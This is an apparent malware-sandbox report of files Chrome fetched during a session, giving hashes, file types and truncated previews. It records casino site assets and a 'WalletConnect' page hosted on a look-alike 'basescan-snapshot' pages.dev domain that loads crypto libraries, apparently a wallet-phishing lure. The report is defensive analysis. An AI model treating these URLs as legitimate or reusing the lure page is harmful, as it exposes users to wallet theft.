                                                                                                                                                                                                                                              SHA-256:A3CF00C109D907E543BC4F6DBC85EB31068F94515251347E9E57509B52EE3D74
                                                                                                                                                                                                                                              SHA-512:69528A4518BF43F615FB89A3A0A06C138C771FE0647A0A0CFDE9B8E8D3650AA3539946000E305B78D79F371615EE0894A74571202B6A76B6EA53B89569E64D5C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:/*! jQuery v3.6.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):128638
                                                                                                                                                                                                                                              Entropy (8bit):7.995943232488857
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:3072:OtDWriLeTrKhYvTcUJUeWQLc6SNWPfPZl5Hm:O1Wqeicei46S0dHm
                                                                                                                                                                                                                                              MD5:6BC5CE44ACF388CF69980AF1FC15DE3F
                                                                                                                                                                                                                                              SHA1:6D71AC7AD8351C36F1741F3AAB64DEB6B6C7B0F4
                                                                                                                                                                                                                                              SHA-256:79DBDFAE33F7404C4989B783AD5714CF55930BB5240B99E98DF1216B9E909EDC
                                                                                                                                                                                                                                              SHA-512:03E2EEA3143BA0D1CCAF6DE38C3771419404248077AC0DB29CB49612F9AEDA8AFF19252E0C79AB7763C88EF85362A3C590C19275330EC8F055E297876047911C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/banner-DCWqOOaK.png
                                                                                                                                                                                                                                              Preview:RIFFv...WEBPVP8Li.../}.......4.m..23.c..}......$....k.V....'...J.$:..z.#..[.....TJ..Ore.wm..n....,....q.Z....#[....|....D....w.........C....(..J=...0.,..|.I...tT..\8iRj.P(TgEY.......Jl........!w..<.4.R..Uj.YS....a.Z.....i.B*}.Xy..R.p0...'...6..$..Z.T.-..x..yN...g...6;.E.....F.Lm,_..f..........2.W.<.rj.0.[..f..'..80JG.Pt@..uLg...Z..$r.s.u.t..../0u.n&....@qo.7...:..^zk|~j..}.......I....&..w.V..K..N\Uv].sI....kS..3.dz0..?..^N.9.ukM.?.~......hn.\......d.?........SM.."..c.L..W.C5....LJ.}.~j'..|D....d...G.A0.V..8.IF"..^.W.......C....&.'.....IkQc.t..Z.D.r.CC.D.X......Y.55....-E.u.........ilp.c.-ac.\B.p.D..>.....C#..&E`4....4....4..f.... 8...j.$.....'.&.).rm"RF.&Z..c5.E9...g...:...qtr...>9:....{..j..L.8.|....$...,:..... .....V.......&IA....t2..a.R..`|.m..._..C...../[...L).#....=...y...|.^...4.9...'.*.=.@.f.^......:0 .!...N.Ua.t...`.k.~....P..U..z..e..&.U.}I.o...(IB.ex..um.ls.$.c.....^.Rx6K..S...6`...Lf.gd.....f,..l..De.LK.8....y..G%i..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9
                                                                                                                                                                                                                                              Entropy (8bit):2.94770277922009
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:mn:mn
                                                                                                                                                                                                                                              MD5:722969577A96CA3953E84E3D949DEE81
                                                                                                                                                                                                                                              SHA1:3DAB5F6012E3E149B5A939B9CEBBA4A0B84DC8F5
                                                                                                                                                                                                                                              SHA-256:78342A0905A72CE44DA083DCB5D23B8EA0C16992BA2A82EECE97E033D76BA3D3
                                                                                                                                                                                                                                              SHA-512:54B2B4596CD1769E46A12A0CA6EDE70468985CF8771C2B11E75B3F52567A64418BC24C067D96D52037E0E135E7A7FF828AD0241D55B827506E1C67DE1CAEE8BC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:Forbidden
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9
                                                                                                                                                                                                                                              Entropy (8bit):2.94770277922009
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:mn:mn
                                                                                                                                                                                                                                              MD5:722969577A96CA3953E84E3D949DEE81
                                                                                                                                                                                                                                              SHA1:3DAB5F6012E3E149B5A939B9CEBBA4A0B84DC8F5
                                                                                                                                                                                                                                              SHA-256:78342A0905A72CE44DA083DCB5D23B8EA0C16992BA2A82EECE97E033D76BA3D3
                                                                                                                                                                                                                                              SHA-512:54B2B4596CD1769E46A12A0CA6EDE70468985CF8771C2B11E75B3F52567A64418BC24C067D96D52037E0E135E7A7FF828AD0241D55B827506E1C67DE1CAEE8BC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:Forbidden
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):65
                                                                                                                                                                                                                                              Entropy (8bit):4.493381997870699
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:TMQMfXA2HNOOVAoRqPAGPifFEgwn:ARfpVAM0AHNwn
                                                                                                                                                                                                                                              MD5:1B900AABE1EAAD963A6C2453140991C3
                                                                                                                                                                                                                                              SHA1:8D91B82DD07556187B75A0C72105D2C87D46E28C
                                                                                                                                                                                                                                              SHA-256:142D88EDCFCEBF2AAB353BA887C17C050AE9A9E2882142BC8EEC793F53868B73
                                                                                                                                                                                                                                              SHA-512:9B719F692DAE0219301826B112F5CCC9C34319695040DD3BB89DBAB88238A53892AA42E90427CF7F7B145AE6FFA31013F0B303D8AFB1EEAEB0792C8CE0EE969D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/account2/assets/isObjectLike-e68f0fe0.js
                                                                                                                                                                                                                                              Preview:function e(t){return t!=null&&typeof t=="object"}export{e as i};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 476 x 478, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):43685
                                                                                                                                                                                                                                              Entropy (8bit):7.9401060381569915
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:XH7hF131H+XoKUVYvr/etpfOQAk28KmTSKBM47cxMx62gEet:XN3JFnYvr/etp2QAk28Ke9BoxTlJ
                                                                                                                                                                                                                                              MD5:14B308E247AF6DD88CD692D42133358A
                                                                                                                                                                                                                                              SHA1:528BF4DA81F5163131E640A3BD4748EFF5773BF7
                                                                                                                                                                                                                                              SHA-256:D41FC95679CA4A2EA8F0BC63489736A5406212E78C3B0AB0703C65F843827B2C
                                                                                                                                                                                                                                              SHA-512:918832E66FD195ABCA8CE1105D6D74BB2C0E1A7FED03B3D2968CC70FF83A29CBF06215B8D4A4C2157DD653A817FD3F3DC1E171F525FC389D0FAC0B66137B41F4
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...............J.....PLTE.....d....h...>L..].EP...6G.....o..}..w..r..a..i.TF..p.MT.[G..n..S..h.0?..r.*<.&4.OC..N....R..e.....A..G.....a..[.`J..o..|..[..d.~n..[.yY..i..|.I?.hd.\`..I.SZ..q..y.jP. ..^5.eM.sjr...U.....p.==.6....oS...7...x.*..$f..O)..l./.> .>/.H!.g8zR..34hH..V..X..sV./%..f..erL...[2..[U..T.uC.... .7.>+.eZ..t.zc.p<.H3[A......?..b.q_[...rO..y..rR.S7...<...<...qM.+....c....{&F).mIM.x..f.|C.%1........R..N.n.....gAl...o6.u.!.'T>@...Z....b..gJ.}[.YG.q4.f..H.L3.xP=.j..o/._.n..52&.X).r.?^ J$.`C]..&..)N....a...M...*..O.......aqW..M@-eF#B7..c"wQ".b$.j.kA(7...W!.O..2..l..oJ.}..N,.wJh?..B+.?&.a..v..gC.K..3.p06<.....q6y5.~..6..}b&.~KL.2.b.@3...W:1.i|@.}...~.M....1.{P;[.....o...\E..[5...fL...]..[.......I.W3..\..T.W1.z/..t..\!..._...O..*...."....Yt........tRNS...................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1260
                                                                                                                                                                                                                                              Entropy (8bit):5.777034431410559
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:+ZYj6L3szum8COZNDsLlpGPUc6QlXtfQfd/qEIZ+AU7nIYK:+ZYjw3slfll0xlXG1IZDKnpK
                                                                                                                                                                                                                                              MD5:B2BDBB88E84731DE5A2228D6CE66DE2F
                                                                                                                                                                                                                                              SHA1:37A22F255098D061EA3235D41F6C4894CB2184EA
                                                                                                                                                                                                                                              SHA-256:334F87ED4CD15528972AA3628ACBA0D5839609C0BCF41383BD8B10198C5B2F22
                                                                                                                                                                                                                                              SHA-512:27DD28F1E887CA46B96A78F9A22DEC2AE581E0F3321AE15DAE33648AE8834057F8DF682B948BC403F8E8D823AD5D78178D91DB479D4F991EEC59DCC92EC12AB1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/ca456564-e22a-47f9-ac2d-c70fad6c3534.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D............3.......(iinf..........infe........av01Color.....iprp...cipco....ispe.......d...d....pixi............av1C........colrprof....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0......colrnclx...........ipma....................mdat........`...B2.......1..+Q.d.`.u....n|..5.e. ......O.<4.m.k.G.u..7..^..?N}...d.H}.}..N).Aok{MA...J..A.d.`..c{~....Z...*s..88bi./.h8..1H....>..88.....+..YJ..>....Q.p.-xk."../..\.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (568)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):569
                                                                                                                                                                                                                                              Entropy (8bit):5.130899747920007
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:3m8HpiQ8aQ4swvifXtvqNW9MAucqmUDfAf3dlO:wEQX1qNWE7atw
                                                                                                                                                                                                                                              MD5:6AB3ED9BF3B332F6B79B1D30928B3930
                                                                                                                                                                                                                                              SHA1:4CCFB5884974B538B4DC992B29C3F13A6CC40A57
                                                                                                                                                                                                                                              SHA-256:4678890270E5092FC969675588DFD1CD1FBA88E3596ED2F20436E20B8CB35A31
                                                                                                                                                                                                                                              SHA-512:9D82FC0BD9B224B7AA31184E3DDF3FF36166F0EC996DB7DFBB5181E4DD7FF51BFFED34C02DCC2DDAAF930E125C2022A58BD90C6F5CB4988E6FB754CA1ACEDF37
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:var e=Object.defineProperty,m=Object.defineProperties;var s=Object.getOwnPropertyDescriptors;var l=Object.getOwnPropertySymbols;var u=Object.prototype.hasOwnProperty,p=Object.prototype.propertyIsEnumerable;var n=(o,a,t)=>a in o?e(o,a,{enumerable:!0,configurable:!0,writable:!0,value:t}):o[a]=t,r=(o,a)=>{for(var t in a||(a={}))u.call(a,t)&&n(o,t,a[t]);if(l)for(var t of l(a))p.call(a,t)&&n(o,t,a[t]);return o},c=(o,a)=>m(o,s(a));import{X as i,D as x}from"./manifest-51a3674f.js";const S=c(r({},i),{amount2localStr:(o,a)=>i.amount2localStr(new x(o),a)});export{S as l};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 41 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):5362
                                                                                                                                                                                                                                              Entropy (8bit):7.95774928201351
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:qM4xXGrwBX9mgUPUWvxMOk5o53fBM08w5MjBOWhXWqW90TOtUOZA9c:q/X+w38vxMOkevBMm5MwoGt06thZAi
                                                                                                                                                                                                                                              MD5:02EA5339E331C3D91492EF65C5285F18
                                                                                                                                                                                                                                              SHA1:B64E0B27DEC3CC6BBB5734955B24B6D4D9C43A44
                                                                                                                                                                                                                                              SHA-256:24B5E5E7BE166B4CA3FF2D9984E8B6DD1CC1DAC73032B60FDE94BDDC0ED1758B
                                                                                                                                                                                                                                              SHA-512:1C9E9E3782FD53B2F3ACA3F5D2FD763160D4A0108E1CF6C34403894A5A5DBE07D66B886725A4CB1AF90902592C2CB2529F130734C93C5560DDB42F33934EEFEE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...)...(.....c<.S....iCCPicc..x..wPS..........).7A:.....(H..!...bHP.+.+..TD...".....".mQ.....(.X.......v...f.w....3....~3.7s.h.|.$......Q.....$....@.5p.]. O....L#..z....t.n...7i.S...H$.).<A..G.x..He....`:G&.....R........7.)#.....(....2....PY......0...A,..1.`..+....VX...a.v._|...3E...+y...E...I.......l....XP3.!QX..@.f.)Y.2%b.EB.Q.... ..4.B~@.rm...QN...>2^.(...F..47*B./.rF./..W....g.....1./..2.yY.ac=\e]*..U.A..?.o...9y.....\+..Q...=.....KP.M...8...............V...ke..9.62f.3.....\.l,...p.+.@.:W.....yRQz....^X*.'..O`9989...W..[& XB...j.).....c....G..(...e......:.\..#..&.P@.....`.V`.N..^.........0....9 .9...B...Z.....v.>8....N.Y..W.:....nx.......!!4..."F.9b.8!l...D.($.IF..1"G. .....@v"../.q.,r.iG.!.H/.....P*.@.P.t".F9h....@...h.Z..F..*..Z..E...P......N......pl....K..E.b\...W.k..n...>.'<.O..vx/|.>./.../..W.....-...N|?...F.'..<.<B.!.0.PD(#.!.#.'."t....D&..N.!&.3...[.u.3.vb.q.D".lI....$#..6...N.:H..dU....DN"....e...S..r.yPEC.\.S%BE.2Oe..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9
                                                                                                                                                                                                                                              Entropy (8bit):2.94770277922009
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:mn:mn
                                                                                                                                                                                                                                              MD5:722969577A96CA3953E84E3D949DEE81
                                                                                                                                                                                                                                              SHA1:3DAB5F6012E3E149B5A939B9CEBBA4A0B84DC8F5
                                                                                                                                                                                                                                              SHA-256:78342A0905A72CE44DA083DCB5D23B8EA0C16992BA2A82EECE97E033D76BA3D3
                                                                                                                                                                                                                                              SHA-512:54B2B4596CD1769E46A12A0CA6EDE70468985CF8771C2B11E75B3F52567A64418BC24C067D96D52037E0E135E7A7FF828AD0241D55B827506E1C67DE1CAEE8BC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:Forbidden
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/config.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (29077)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):29122
                                                                                                                                                                                                                                              Entropy (8bit):5.755803247435433
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:o/zUClhUqx5bxXty7cpaQQSn/A+WuJbwYnLvempdp0W4sDH7LMGBV1e85VV:odUqx5FXCQQSoOt1LvemtbMGBB5VV
                                                                                                                                                                                                                                              MD5:9EABD04E447B0B52D59DC97FB6C30036
                                                                                                                                                                                                                                              SHA1:6D4DC3253BCDB75FF2ABE6CB68EA5E8E0E5E872E
                                                                                                                                                                                                                                              SHA-256:C8FC0EFD4803279CFD893338C162E4DB295EF2D13552F4969BF30EF7CF62785E
                                                                                                                                                                                                                                              SHA-512:CCC0158F78AFAB86BCFE75E99692EA7E2129585E66CFEA2451C3F399966D669CCDC80EB55C23D2A245E4ADDDD16CE238F1643A0C5516547AD52BC3568AC3980E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{z as t}from"./manifest-aca455c4.js";const r=`.sticky{position:sticky}.-bottom-4{bottom:-1rem}.-top-2{top:-.5rem}.bottom-28{bottom:7rem}.bottom-5{bottom:1.25rem}.left-1{left:.25rem}.left-2{left:.5rem}.left-2\\.5{left:.625rem}.left-6{left:1.5rem}.left-7{left:1.75rem}.left-9{left:2.25rem}.left-\\[14\\%\\]{left:14%}.left-\\[18\\%\\]{left:18%}.left-\\[20\\%\\]{left:20%}.left-\\[37\\%\\]{left:37%}.left-\\[53\\%\\]{left:53%}.left-\\[68\\%\\]{left:68%}.right-16{right:4rem}.right-2{right:.5rem}.right-2\\.5{right:.625rem}.right-3{right:.75rem}.right-4{right:1rem}.right-\\[-2px\\]{right:-2px}.right-\\[15\\%\\]{right:15%}.top-10{top:2.5rem}.top-12{top:3rem}.top-14{top:3.5rem}.top-2\\.5{top:.625rem}.top-24{top:6rem}.top-3\\.5{top:.875rem}.top-7{top:1.75rem}.top-8{top:2rem}.top-\\[-2px\\]{top:-2px}.top-\\[22\\%\\]{top:22%}.top-\\[26\\%\\]{top:26%}.top-\\[28\\%\\]{top:28%}.top-\\[3\\%\\]{top:3%}.top-\\[30\\%\\]{top:30%}.top-\\[47\\%\\]{top:47%}.top-\\[64\\%\\]{top:64%}.top-\\[7\\%\\]{top:7%}.t
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):28708
                                                                                                                                                                                                                                              Entropy (8bit):7.991340079205023
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:384:sojtTNXX4Q/C3K1SqeHFVdwtWAhaam3QPbJ6VzAK7bgaUgggz0nODFLE7FaGIJXJ:sqtTZoaBEutWLJT/mLg4nd7YRNef8b/
                                                                                                                                                                                                                                              MD5:C879C5A561375D6E3A4CEBF473E421F4
                                                                                                                                                                                                                                              SHA1:DF3EF713450D093730B0576E698835F91E1B846C
                                                                                                                                                                                                                                              SHA-256:F760C52B66CB4BAF202B980D803BDCD622439AE41A3EC7AC5F89DD6C531E8363
                                                                                                                                                                                                                                              SHA-512:197CF8896C5C9F563239C1875E7D0A69C5030B02936D6D4C434DD4060D7E1C8A057E2ECE45D41747A6AC997D02E542B7341F69E37B26CDDEC88136760141D25C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/casino-sigma-europe-2022-DQsRoTiA.png
                                                                                                                                                                                                                                              Preview:RIFF.p..WEBPVP8L.p../..=...;..M.......?*K.^..#I..xV.,7.@.T@.mPbf.. E..H.=..........m..'.|.P......$..............$..@...H-..D....AH.A..! ...,.Y...Y.".E".DC.....jt........M......A.+..6.n.v..{=.7TR...F.."=........Y('/P.C.*@+.xu0:%.tK.....s.....7.....e>y.;........Ug.zz}......i....65Os...Z.Wet.)..._..V.ZTT....~2|...J.DS9.dQ.k\...MA.v...8R"..".b...BQ..S.J8E...i....$.?..,~..)...h7-Iel.......e.EcEC.........4?...2r.....T..:.{o.-[......{u....9.{..:pz....u..M...u....e.....W2...K.%...J.....D.Eq8NMa%E.).+<.....$#.B.F..>..z..A.m.f..z?.....$.i{ZY...Nuuf.<|....@......m.v#].....Of.0...)X.H,.....r..cm... ...`[.\.. ...i..,..7.mB...&.s..a.T..&......y.d.=.^......V+.i.B...y%l.q....Y....$m&1jn./..u...kk..l...dRt.,Z[wR..@9..;.tE..Q..P.h.w .u..\..&..$.....X....8...C.$.n.Q..8R...{K>...m..H!zZQ69.]6.A.2.....q.[....f..V...6.=.}=.;xBD.m.....D..A..t6AOO..O..MO.m.Z.71vzr.A.e....v.........j.p.N0.(.j..../...R......#...`.....mL.{..{.....i.z5..XO.....0;...Ej....
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/config.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (4843)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):4844
                                                                                                                                                                                                                                              Entropy (8bit):5.561004093762609
                                                                                                                                                                                                                                              Encrypted:false
